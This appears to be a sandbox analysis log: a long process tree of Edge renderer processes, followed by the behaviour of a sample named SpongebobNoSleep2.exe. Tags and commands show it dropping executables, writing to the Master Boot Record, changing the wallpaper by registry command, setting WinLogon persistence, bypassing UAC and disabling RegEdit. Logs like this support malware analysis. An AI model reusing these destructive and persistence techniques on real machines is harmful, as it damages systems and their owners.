C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:12⤵PID:236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:12⤵PID:4596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:12⤵PID:2460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:12⤵PID:3432
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:12⤵PID:404
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7352 /prefetch:12⤵PID:648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:12⤵PID:3296
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:12⤵PID:836
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8032 /prefetch:12⤵PID:3500
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:12⤵PID:5444
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:12⤵PID:5452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:12⤵PID:5600
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8608 /prefetch:12⤵PID:5792
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8360 /prefetch:12⤵PID:6120
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8916 /prefetch:12⤵PID:6132
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9052 /prefetch:12⤵PID:6140
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9192 /prefetch:12⤵PID:5228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9200 /prefetch:12⤵PID:5248
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:12⤵PID:5936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7968 /prefetch:12⤵PID:5992
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9940 /prefetch:12⤵PID:6068
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9916 /prefetch:12⤵PID:5876
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7728 /prefetch:12⤵PID:6000
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10072 /prefetch:12⤵PID:6176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10420 /prefetch:12⤵PID:6380
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10372 /prefetch:12⤵PID:6452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10012 /prefetch:12⤵PID:6736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10552 /prefetch:12⤵PID:7092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8476 /prefetch:12⤵PID:6248
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10644 /prefetch:12⤵PID:1360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10896 /prefetch:12⤵PID:6864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11004 /prefetch:12⤵PID:6948
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11136 /prefetch:12⤵PID:564
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11328 /prefetch:12⤵PID:6560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11344 /prefetch:12⤵PID:6640
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11616 /prefetch:12⤵PID:6844
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11940 /prefetch:12⤵PID:6572
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11968 /prefetch:12⤵PID:6872
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11572 /prefetch:12⤵PID:6880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12136 /prefetch:12⤵PID:6532
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9912 /prefetch:12⤵PID:6060
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12396 /prefetch:12⤵PID:6976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12528 /prefetch:12⤵PID:7176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12676 /prefetch:12⤵PID:7184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12808 /prefetch:12⤵PID:7192
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13132 /prefetch:12⤵PID:7468
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9476 /prefetch:12⤵PID:7936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10800 /prefetch:12⤵PID:6392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9188 /prefetch:12⤵PID:6440
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13188 /prefetch:12⤵PID:7580
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:5548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9132 /prefetch:12⤵PID:5560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9340 /prefetch:12⤵PID:6164
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3548
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3588
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004EC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\Temp1_SpongeBobNoSleep2 (HorrorBob5).zip\SpongebobNoSleep2.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_SpongeBobNoSleep2 (HorrorBob5).zip\SpongebobNoSleep2.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1728 -
C:\Windows\system32\wscript.exe"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6330.tmp\6331.tmp\6332.vbs //Nologo2⤵PID:3128
-
C:\Users\Admin\AppData\Local\Temp\6330.tmp\mbr.exe"C:\Users\Admin\AppData\Local\Temp\6330.tmp\mbr.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:4792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6330.tmp\tools.cmd" "3⤵
- Drops file in Windows directory
PID:3488 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f4⤵
- Sets desktop wallpaper using registry
PID:2332 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3908
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4892
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:1140
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:704
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3800
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:5076
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3512
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:1288
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2596
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:1620
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:1212
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2612
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:8
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3164
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4976
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4408
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4848
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3180
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2016
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:1312
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2300
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4620
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2948
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2816
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3304
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:1732
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3804
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2072
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:492
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4560
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3816
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:2200
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:5064
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:4448
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3552
-
C:\Users\Admin\AppData\Local\Temp\6330.tmp\MainWindow.exe"C:\Users\Admin\AppData\Local\Temp\6330.tmp\MainWindow.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\6330.tmp\gdifuncs.exe"C:\Users\Admin\AppData\Local\Temp\6330.tmp\gdifuncs.exe"3⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
